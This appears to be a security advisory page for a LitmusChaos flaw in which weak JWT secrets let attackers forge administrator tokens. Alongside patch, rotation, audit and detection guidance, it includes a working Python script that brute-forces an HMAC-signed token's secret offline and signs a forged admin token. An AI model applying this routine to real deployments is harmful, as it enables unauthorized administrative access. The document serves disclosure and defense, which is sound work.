CVE-2025-14261
📋 TL;DR
CVE-2025-14261 is an authentication bypass in LitmusChaos: session JWTs are signed with a secret that has far too little entropy (a 6-byte secret, so at most 2^48 possibilities), which makes the secret recoverable by brute force. Anyone holding one token issued by the instance can recover the signing secret offline and then mint tokens for any user, administrators included. Every deployment still running with the default or a comparably weak JWT secret is affected.
💻 Affected Systems
- LitmusChaos
⚠️ Manual Verification Required
This CVE has no version range in our database, so automated detection cannot tell whether your deployment is affected.
Why? The CVE entry does not state which versions are vulnerable (no version ranges provided by the vendor or NVD). Because the defect is the secret's strength rather than a particular code path, the secret in use is the better thing to inspect.
- Review the CVE entry at NVD and the JFrog advisory linked under Fix & Mitigation
- Check the LitmusChaos release notes for the fix (pull request #5324) against the version you run
- Inspect the JWT secret your deployment actually uses: a value shorter than 32 bytes, or the shipped default, is exploitable regardless of version
- Update to the latest release as a precaution, and rotate the secret either way
⚠️ Risk & Real-World Impact
Worst Case
Complete compromise of the LitmusChaos control plane: an attacker holding a forged administrator token can run arbitrary chaos experiments, change configuration and read any data Litmus stores. Because Litmus dispatches experiments to target Kubernetes clusters, control of Litmus can also become a foothold in those clusters.
Likely Case
Attackers forge valid JWT tokens to gain administrative access to Litmus, enabling them to view, modify, or execute chaos experiments without authorization.
If Mitigated
Network segmentation and access controls limit who can reach the Litmus API at all, and therefore who can obtain a token to attack, and they contain a compromised Litmus to the platform itself. They do not stop anyone who can reach the API from forging tokens; only rotating to a strong secret closes the hole.
🎯 Exploit Status
The attack is offline. With one valid token (obtained, for example, by logging in with any low-privileged account), every candidate secret can be tested locally by recomputing the token's HMAC signature and comparing it with the one the server attached, so the server sees no failed attempts. A 6-byte secret bounds the search at 2^48 HMAC computations, and far fewer if the secret is drawn from printable characters, which is within reach of commodity GPU cracking tools. Public references demonstrate the methodology.
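The offline recovery described above, as an added example in Python that is not part of the original page or of the LitmusChaos code base. It assumes HS256 (HMAC-SHA256) tokens; the claim names and the 3-character demo secret are constructed for the example so the search finishes instantly, and a 6-byte secret is the same loop over a 2^48 space.

```python
import base64
import hashlib
import hmac
import itertools
import json
import math
import string
from typing import Optional


def b64url(data: bytes) -> str:
    """Base64url without padding, the encoding JWTs use (RFC 7515)."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims: dict, secret: bytes) -> str:
    """Mint header.payload.signature with HMAC-SHA256 over 'header.payload'."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = f"{header}.{payload}".encode("ascii")
    return f"{header}.{payload}." + b64url(hmac.new(secret, signing_input, hashlib.sha256).digest())


def keyspace_bits(secret_len: int, alphabet_size: int = 256) -> float:
    """Work (in bits) to exhaust every secret of secret_len symbols drawn from alphabet_size."""
    return secret_len * math.log2(alphabet_size)


def recover_secret(token: str, alphabet: str, max_len: int) -> Optional[bytes]:
    """Offline brute force. Each candidate is checked by recomputing the HMAC locally
    and comparing it with the signature the server attached, so the server never
    sees a request and logs nothing while this runs."""
    header, payload, sig = token.split(".")
    signing_input = f"{header}.{payload}".encode("ascii")
    target = b64url_decode(sig)
    symbols = alphabet.encode("ascii")
    for length in range(1, max_len + 1):
        for candidate in itertools.product(symbols, repeat=length):
            guess = bytes(candidate)
            if hmac.compare_digest(hmac.new(guess, signing_input, hashlib.sha256).digest(), target):
                return guess
    return None


def forge_admin_token(recovered_secret: bytes) -> str:
    """Once the secret is known, any claims the server trusts can be signed.
    The claim names here are placeholders, not Litmus' actual token schema."""
    return sign_hs256({"sub": "admin", "role": "admin"}, recovered_secret)


if __name__ == "__main__":
    # Constructed demo: a 3-character secret over [a-z0-9] so the search is instant.
    # Tools such as hashcat run the same loop on a GPU for the real 2^48 space.
    weak_secret = b"k9x"
    captured = sign_hs256({"sub": "lowpriv-user"}, weak_secret)
    found = recover_secret(captured, string.ascii_lowercase + string.digits, 3)
    print("recovered:", found, "| keyspace for 6 random bytes:", keyspace_bits(6), "bits")
    print("forged:", forge_admin_token(found))
```

Note the asymmetry the example makes visible: the defender's server does one HMAC per request, while the attacker does all of theirs offline, so no rate limit or lockout on the login endpoint affects this search.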
🛠️ Fix & Mitigation
✅ Official Fix
Patch: fixed by pull request #5324 (no release number is recorded here; check whether the image tag you run contains that PR)
Vendor Advisory: https://research.jfrog.com/vulnerabilities/litmus-jwt-missing-entropy-elevation-jfsa-2025-001648159/
Restart Required: Yes
Instructions:
1. Update Litmus to a release that contains PR #5324.
2. Regenerate the JWT secret with at least 32 bytes from a cryptographic random source.
3. Restart the Litmus components that read the secret so they pick up the new value.
4. Every token signed under the old secret is now rejected, so all users must log in again. Treat activity performed under tokens issued before the rotation as potentially attacker-initiated.
🔧 Temporary Workarounds
Manual JWT Secret Rotation
Replace the weak JWT secret with one of at least 32 random bytes. The secret name and key below are placeholders; use the names your manifests or Helm values define.
kubectl edit secret <litmus-jwt-secret> -n litmus
Set the jwt-secret value to the base64 encoding of at least 32 bytes from a cryptographic random source, then restart the components that read the secret, since pods only read it at start-up. All existing sessions become invalid as a result, which is intended.
🧯 If You Can't Patch
- Restrict network access to the Litmus API so that only trusted users and agents can reach it; an attacker who can neither obtain nor present a token has nothing to work with
- Put an API gateway or WAF in front of Litmus for rate limiting and logging, but know its limit: a forged token carries a valid signature, so gateway-side JWT validation with the same secret accepts it too, and rate limiting slows only online guessing, not the offline search
🔍 How to Verify
Check if Vulnerable:
Check whether the configured JWT secret is shorter than 32 bytes or is still the value shipped by default; either is vulnerable regardless of version. A long secret built from a tiny character set (repeated characters, a dictionary word padded out) is also weak.
Check Version:
kubectl get pods -n litmus -o jsonpath='{.items[*].spec.containers[*].image}' | grep litmus
Verify Fix Applied:
Confirm the secret now in use is at least 32 random bytes, and that a token issued before the rotation is rejected by the API (expect an authentication error, not a successful response).
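An added audit helper for the checks above, written in Python for this page and not part of LitmusChaos. It parses the JSON that `kubectl get secret ... -o json` prints, decodes every key whose name mentions "jwt", and applies the 32-byte bar plus a diversity heuristic so that padded or repetitive values are also flagged. The secret and key names in the constructed samples are placeholders, and `generate_secret` produces a replacement value from the OS CSPRNG.

```python
import base64
import json
import math
import os
from collections import Counter

MIN_SECRET_BYTES = 32      # the bar the mitigation above sets
MIN_ESTIMATED_BITS = 96    # heuristic: catches long-but-repetitive values such as "aaaa..."


def secret_manifest(name: str, data: dict) -> str:
    """Build the JSON kubectl prints for a Secret; values are base64, as in the API."""
    return json.dumps({
        "apiVersion": "v1",
        "kind": "Secret",
        "metadata": {"name": name, "namespace": "litmus"},
        "data": {k: base64.b64encode(v).decode("ascii") for k, v in data.items()},
    })


def shannon_bits_per_byte(raw: bytes) -> float:
    """Shannon estimate over observed byte frequencies (8.0 is the maximum)."""
    n = len(raw)
    if n == 0:
        return 0.0
    return max(0.0, -sum(c / n * math.log2(c / n) for c in Counter(raw).values()))


def audit_secret(secret_json: str, key_hint: str = "jwt") -> list:
    """Report, for every data key containing key_hint, whether the decoded value
    meets the length bar and does not look like a low-diversity string."""
    obj = json.loads(secret_json)
    findings = []
    for key, encoded in obj.get("data", {}).items():
        if key_hint.lower() not in key.lower():
            continue
        raw = base64.b64decode(encoded)
        est_bits = len(raw) * shannon_bits_per_byte(raw)
        problems = []
        if len(raw) < MIN_SECRET_BYTES:
            problems.append(f"{len(raw)} bytes, fewer than {MIN_SECRET_BYTES}")
        if est_bits < MIN_ESTIMATED_BITS:
            problems.append(f"estimated {est_bits:.0f} bits, low byte diversity")
        findings.append({
            "key": key,
            "length": len(raw),
            "estimated_bits": round(est_bits),
            "ok": not problems,
            "problems": problems,
        })
    return findings


def generate_secret(n_bytes: int = 32) -> bytes:
    """Replacement value from the OS CSPRNG; base64-encode it before storing in the Secret."""
    return os.urandom(n_bytes)


# Constructed samples of what `kubectl get secret litmus-jwt-secret -n litmus -o json`
# might return; names are placeholders for this example.
SAMPLE_WEAK = secret_manifest("litmus-jwt-secret", {
    "jwt-secret": b"abc123",          # 6 bytes: the condition this CVE describes
    "DB_PASSWORD": b"not-a-jwt-key",  # unrelated key, ignored by the audit
})
SAMPLE_PADDED = secret_manifest("litmus-jwt-secret", {"jwt-secret": b"a" * 40})  # long, worthless

if __name__ == "__main__":
    rotated = secret_manifest("litmus-jwt-secret", {"jwt-secret": generate_secret()})
    for label, doc in [("weak", SAMPLE_WEAK), ("padded", SAMPLE_PADDED), ("rotated", rotated)]:
        for finding in audit_secret(doc):
            print(label, finding)
```

Feed it the output of `kubectl get secret <name> -n litmus -o json`; a finding with `"ok": False` means the deployment is still exploitable even if the image contains the fix.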
📡 Detection & Monitoring
Log Indicators:
- A burst of failed JWT validations from one source followed by a successful authentication (this catches online guessing only; the offline attack produces no failures at all)
- Successful token validations for a user or source address with no corresponding login event
- Administrative actions from addresses or accounts that do not normally perform them
Network Indicators:
- Unusual request volume or timing against the auth endpoints
- Forged tokens carry a valid signature, so the signature itself is not an indicator; compare token claims (subject, issue time, expiry) against sessions the login service actually issued
SIEM Query:
source="litmus" AND (event="authentication" OR event="jwt_validation") AND result="success" | stats count by src_ip
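The two log indicators above as detection logic over sample lines, added here as an example in Python and not taken from the page or from LitmusChaos. The key=value line format, the event names (`login`, `jwt_validation`) and the sample addresses are assumptions constructed for the example; adapt `LINE_RE` to the fields your deployment emits. The second rule is the one that also covers the offline attack, because a forged token is accepted without any login having produced it.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

FAIL_THRESHOLD = 5
WINDOW = timedelta(minutes=10)

# Assumed key=value line format; Litmus' real log layout may differ.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) event=(?P<event>\w+) result=(?P<result>\w+) src_ip=(?P<ip>[\d.]+)(?: user=(?P<user>\S+))?"
)

# Constructed sample: a normal session, then a burst of failed validations from one
# address followed by an accepted admin token that no login produced.
SAMPLE_LOGS = """\
2025-06-01T12:00:00+00:00 event=login result=success src_ip=10.0.0.5 user=alice
2025-06-01T12:00:02+00:00 event=jwt_validation result=success src_ip=10.0.0.5 user=alice
2025-06-01T12:05:00+00:00 event=jwt_validation result=failure src_ip=203.0.113.9
2025-06-01T12:05:01+00:00 event=jwt_validation result=failure src_ip=203.0.113.9
2025-06-01T12:05:02+00:00 event=jwt_validation result=failure src_ip=203.0.113.9
2025-06-01T12:05:03+00:00 event=jwt_validation result=failure src_ip=203.0.113.9
2025-06-01T12:05:04+00:00 event=jwt_validation result=failure src_ip=203.0.113.9
2025-06-01T12:05:30+00:00 event=jwt_validation result=success src_ip=203.0.113.9 user=admin
"""


def parse(line: str):
    """Return the event as a dict with a datetime timestamp, or None for non-matching lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.fromisoformat(ev["ts"])
    return ev


def burst_then_success(lines) -> list:
    """Rule 1 (online guessing): at least FAIL_THRESHOLD failed validations from one
    address inside WINDOW, then a success from the same address."""
    failures = defaultdict(list)
    alerts = []
    for ev in filter(None, map(parse, lines)):
        if ev["event"] != "jwt_validation":
            continue
        recent = [t for t in failures[ev["ip"]] if ev["ts"] - t <= WINDOW]
        if ev["result"] == "failure":
            failures[ev["ip"]] = recent + [ev["ts"]]
        elif len(recent) >= FAIL_THRESHOLD:
            alerts.append({"src_ip": ev["ip"], "user": ev["user"], "failures": len(recent), "at": ev["ts"]})
            failures[ev["ip"]] = []
    return alerts


def accepted_without_login(lines) -> set:
    """Rule 2 (covers the offline attack): addresses whose tokens were accepted although
    the auth service never recorded a successful login from them. Keyed on address here;
    behind NAT or a load balancer, key on a session or token identifier if one is logged."""
    logged_in, accepted = set(), set()
    for ev in filter(None, map(parse, lines)):
        if ev["event"] == "login" and ev["result"] == "success":
            logged_in.add(ev["ip"])
        elif ev["event"] == "jwt_validation" and ev["result"] == "success":
            accepted.add(ev["ip"])
    return accepted - logged_in


if __name__ == "__main__":
    lines = SAMPLE_LOGS.splitlines()
    print("burst then success:", burst_then_success(lines))
    print("accepted without login:", accepted_without_login(lines))
```

Run it over an export of the auth service's log; rule 2 is the one worth keeping after the secret has been rotated, since it needs no failures to fire.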